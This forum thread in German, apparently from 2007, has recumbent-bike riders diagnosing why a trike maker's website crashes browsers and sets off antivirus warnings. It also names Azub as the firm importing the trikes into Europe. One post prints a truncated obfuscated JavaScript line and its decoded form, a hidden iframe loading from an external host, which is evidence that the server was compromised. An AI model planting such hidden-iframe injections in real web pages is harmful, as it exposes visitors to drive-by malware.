Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 20 von 23

Thema: Vorsicht: Greenspeed-Seiten bringen Firefox zum Absturz!

_gerald hirsch Gast

Standard Vorsicht: Greenspeed-Seiten bringen Firefox zum Absturz!

Hallo Liegeradgemeinde,
    gerade wollte ich mal auf den Seiten von http://www.Greenspeed.com.au/ etwas
    stöbern und habe das Bild auf der Startseite angeklickt und da war es passiert oder vielmehr, es passierte gar nichts mehr. Ich mußte den Prozess vom Firefox
    "abschießen" bevor ich überhaupt wieder im Internet recherchieren konnte.
    Habt ihr mit anderen Browsern ähnliche Erfahrungen gemacht oder kennt ihr
    zufällig den- oder diejenige, die für die Seiten verantwortlich ist?
    Bezüglich Greenspeed würde mich auch interessieren, wer derzeit Importeur für
    Deutschland bzw. Europa ist. Cab-Bike macht es ja nach eigenen Angaben nicht mehr.
    Viellicht kennt sich ja hier jemand aus?

Gruß
    Gerald

Liegeradmagazin.de
    Zitieren Zitieren 0   0   0

_timb Gast

Standard Re: Vorsicht: Greenspeed-Seiten bringen Firefox zum Absturz! Gehe zum vorherigen Beitrag

>Hallo Liegeradgemeinde,
    >gerade wollte ich mal auf den Seiten von http://www.Greenspeed.com.au/ etwas
    >stöbern und habe das Bild auf der Startseite angeklickt und da war es passiert
    >oder vielmehr, es passierte gar nichts mehr. Ich mußte den Prozess vom Firefox
    >"abschießen" bevor ich überhaupt wieder im Internet recherchieren konnte.
    >Habt ihr mit anderen Browsern ähnliche Erfahrungen gemacht oder kennt ihr
    >zufällig den- oder diejenige, die für die Seiten verantwortlich ist?

Also ich hab hier keinerlei Schwierigkeiten, die Seite zu betrachten. FF 2.0.0.9 unter W2k mit NoScript und Adblock plus aktiv. Liegt vielleicht an was anderem bei Dir?

Gruß,

Tim

_pfeife Gast

Standard Re: Vorsicht: Greenspeed-Seiten bringen Firefox zum Absturz! Gehe zum vorherigen Beitrag

keine Probleme bei mir mit firefox. Das Problem liegt sicher woanders. Hast Du es mal mit IE probiert?

Gruß
    Manuel

_pinguin Gast

Also, bei mir hängt sich Firefox 2.0.0.9 auch auf; Adblockplus ist ebenfalls installiert.

ciao
    Pinguin

_gerald hirsch Gast

>Also ich hab hier keinerlei Schwierigkeiten, die Seite zu betrachten. FF 2.0.0.9 unter W2k mit NoScript und Adblock plus aktiv. Liegt vielleicht an was anderem bei Dir?
    >Gruß,
    >Tim

Diese Version verwende ich auch. Meine Frau hat das gleiche Problem und wenn
    wir die Seite mit dem IE7 starten erhalten wir eine Virus-Warnung von Norton-Antivirus. Also irgendwas scheint da nicht zu stimmen.

Gruß
    Gerald.

Liegeradmagazin.de

_thomas aus r Gast

Sollte die Seite Flash-Applikationen verwenden kann es daran liegen:

Nach der Installation von Firefox 2.0.0.9 kann es sein, dass das flash-player-plugin nicht mehr läuft und Firefox abstürzt. Für Linux-User ist hier mit einem erneuten Installieren des flash-player-plugins Abhilfe geschaffen.

Die Seite läuft hier ohne Probleme mit dem Firefox 2.0.0.9 unter Linux.

Thomas aus R.

>Hallo Liegeradgemeinde,
    >stöbern und habe das Bild auf der Startseite angeklickt und da war es passiert oder vielmehr, es passierte gar nichts mehr. Ich mußte den Prozess vom Firefox
    >Bezüglich Greenspeed würde mich auch interessieren, wer derzeit Importeur für
    >Deutschland bzw. Europa ist. Cab-Bike macht es ja nach eigenen Angaben nicht mehr.
    >Viellicht kennt sich ja hier jemand aus?
    >Gruß
    >Gerald

_chris (forummaster) Gast

>Diese Version verwende ich auch. Meine Frau hat das gleiche Problem und wenn
    >wir die Seite mit dem IE7 starten erhalten wir eine Virus-Warnung von Norton-Antivirus. Also irgendwas scheint da nicht zu stimmen.
    >Gruß
    >Gerald.

Hi,
    da ich nicht glaube dass die Seite einen Virus enthält vermute ich,
    dass Dein Norton-AV für den Absturz verantwortlich ist.

Hier läuft die Seite problemlos unter SeaMonkey 1.1.5.

Grüße,
    Chris

_karl moik Gast

Hallo,
    >stöbern und habe das Bild auf der Startseite angeklickt und da war es passiert >oder vielmehr, es passierte gar nichts mehr. Ich mußte den Prozess vom Firefox
    ich kann den Bug bestätigen, mit Firefox 2.0.0.8 unter Kubuntu Gutsy die x64-Version. Der Prozess wurde bei mir zwar automatisch gekillt, die grafische Oberfläche reagiert aber nicht mehr anständig so, dass ein Reboot notwendig wird. Konqueror hat dagegegen überhaupt kein Problem mit der Seite. Wenn du dich drum kümmern willst, der Greenspeed-Webmaster ist unter webmaster@greenspeed.com.au erreichbar.

Gruß
    Karl

Hallo,
    lustig: Bei mir funktioniert's in fast gleicher Konfiguration (XP 5.1 SP2, Firefox 2.0.0.9, NoScript 1.1.8, AdBlock 0.7.5.3) problemlos...
    Und, hat schon wer dem Webmaster geschrieben?
    cheers,
    C.

>Also, bei mir hängt sich Firefox 2.0.0.9 auch auf; Adblockplus ist ebenfalls installiert.
    >ciao
    >Pinguin

_karl moik Gast

>Hallo Liegeradgemeinde,
    >stöbern und habe das Bild auf der Startseite angeklickt und da war es passiert >oder vielmehr, es passierte gar nichts mehr. Ich mußte den Prozess vom Firefox
    Die Seite lädt Daten von bigsexlife.ru nach wenn man auf reload klickt - man kann das kurz in der URL-Leiste ganz unten sehen.

Gruß
    Karl

_uwea Gast

Hallo!

>Deutschland bzw. Europa ist.

AZUB-Bike in Tschechien http://www.greenspeed-europe.com/
    ----------------------------------------------------------
    GREENSPEED EUROPE

22.4.2007

Australian trike manufacturer Greenspeed is very known for its high quality trikes. Last couple of years they very available in Europe with some little dificulties and for quite high price. At the start of the year 2007 there has been based a Greenspeed-Europe branch which is operating by czech company Azub. Thanks to this cooperatin the service will be much faster and also the prices are lower than before. First trikes from european distributor will be available during the June 2007.
    -----------------------------------------------------------

Frohe Grüße!
    Uwe

_ulrichmill Gast

Standard Viruswarnung Gehe zum vorherigen Beitrag

>>Hallo Liegeradgemeinde,
    >>gerade wollte ich mal auf den Seiten von http://www.Greenspeed.com.au/ etwas
    >>stöbern und habe das Bild auf der Startseite angeklickt und da war es passiert >oder vielmehr, es passierte gar nichts mehr. Ich mußte den Prozess vom Firefox
    >Die Seite lädt Daten von bigsexlife.ru nach wenn man auf reload klickt - man kann das kurz in der URL-Leiste ganz unten sehen.
    >Gruß
    >Karl

Auch bei mir unter Windows und Firefox 2.0.0.9 kam es zur Viruswarnung von Bitdefender (Trojan.Downloader.JS.HA). Die Website setzte den über ctrl-alt-delete herbeigerufenen Task-Manager ausser Kraft, sodass ich das System abschalten musste. Also würde ich die auch von einem anderen Antivirusprogramm gegebene Viruswarnung nicht deshalb auf die leichte Schulter nehmen, weil die von Gerald Hirsch, Karl Moik und anderen berichteten Probleme nicht bei allen reproduzierbar sind.

Ulrich

Standard Re: Viruswarnung Gehe zum vorherigen Beitrag

>Auch bei mir unter Windows und Firefox 2.0.0.9 kam es zur Viruswarnung von Bitdefender (Trojan.Downloader.JS.HA). Die Website setzte den über ctrl-alt-delete herbeigerufenen Task-Manager ausser Kraft, sodass ich das System abschalten musste. Also würde ich die auch von einem anderen Antivirusprogramm gegebene Viruswarnung nicht deshalb auf die leichte Schulter nehmen, weil die von Gerald Hirsch, Karl Moik und anderen berichteten Probleme nicht bei allen reproduzierbar sind.

Hi Ullrich,

tatsächlich.

Da ist ein verschlüsseltes JavaScript auf der Startseite:

document.write(unescape('%3C%69%66%72%61%6D%65.... ..'));

entschlüsselt:

< iframe src='http://ltraf*ic.biz/resource.php?id=4534&user=counter100' width='1' height='1' style='visibility: hidden;'>< /iframe >

Da hat wohl jemand den Server gehackt...

Ich schätze, dass der nachgeladene Code über die erst gestern geschlossene Windows-Lücke
    (siehe http://www.heise.de/newsticker/meldung/98929) versucht ins System zu kommen.

Grüße,
    Chris

_andreas scherer Gast

> Konqueror hat dagegegen überhaupt kein Problem mit der Seite.
    Öh, so richtig "toll" fand ich die Reaktion von Konqueror 3.5.8 mit aktiviertem JavaScript beim "Reload" der Seite nicht. Beim ersten Öffnen poppt ein "Speichern"-Dialog für eine 80KB-Datei "setup.exe" hoch, nach <F5> (Reload) fährt die Prozessorlast ins Unendliche.

Andreas

>> Konqueror hat dagegegen überhaupt kein Problem mit der Seite.
    >Öh, so richtig "toll" fand ich die Reaktion von Konqueror 3.5.8 mit aktiviertem JavaScript beim "Reload" der Seite nicht. Beim ersten Öffnen poppt ein "Speichern"-Dialog für eine 80KB-Datei "setup.exe" hoch, nach <F5> (Reload) fährt die Prozessorlast ins Unendliche.
    >Andreas

Und, hast Du die Datei mal gespeichert und auf virustotal.com
    hochgeladen? ;-)

Chris

_hansa Gast

Unter Mac OS X 10.4.9 mit Firefox 2.0.0.7 (plus AdBlock Plus 0.7.2.4, Controle de Scripts 0.5.0.1, Flashblock 1.5.2, NoScript 1.1.4.6) verhält sich die Seite absolut unauffällig.

Gruß, Hans

_andreas seilinger, traumvelo Gast

>Deutschland bzw. Europa ist. Cab-Bike macht es ja nach eigenen Angaben nicht mehr.
    >Gruß
    >Gerald

Hallo Gerald,

Computertechnisch kann ich dir eher wenig weiterhelfen. Aber schick doch jemand mit etwas mehr Peilung auf dem Gebiet eine mail nach Australien. Die Antworten kommen in der Regel recht zügig.

Zu Greenspeed selbst: Der neue Importeur für Europa ist Azub in Tschechien. Sie erhalten Rahmen aus Australien (haben auch einiges auf Lager)und machen den kompletten Aufbau der Räder. Der Vertrieb erfolgt ausschliesslich über den Fachhandel. Eine entsprechende homepage gibt es auch.

Andreas

Greenspeed Europa

_timb Gast

>tatsächlich.
    >Da ist ein verschlüsseltes JavaScript auf der Startseite:
    > document.write(unescape('%3C%69%66%72%61%6D%65.... ..'));
    >entschlüsselt:
    >< iframe src='http://ltraf*ic.biz/resource.php?id=4534&user=counter100' width='1' height='1' style='visibility: hidden;'>< /iframe >
    >Da hat wohl jemand den Server gehackt...

Tja, ich weiß schon, warum ich ohne Javashit unterwegs bin...

Gruß,

Tim

_karl moik Gast

Chris schrieb
    >Da ist ein verschlüsseltes JavaScript auf der Startseite:
    >document.write(unescape('%3C%69%66%72%61%6D%65... ...'));
    >entschlüsselt:
    >src='http://ltraf*ic.biz/resource.php?id=4534&user=counter100' width='1' >height='1' style='visibility: hidden;'>
    Wie hast du die Zeile denn entschlüsselt?

Grüße
    Karl

Standard Seite ist laut webmaster wieder sauber (n/t) Gehe zum vorherigen Beitrag

Lesezeichen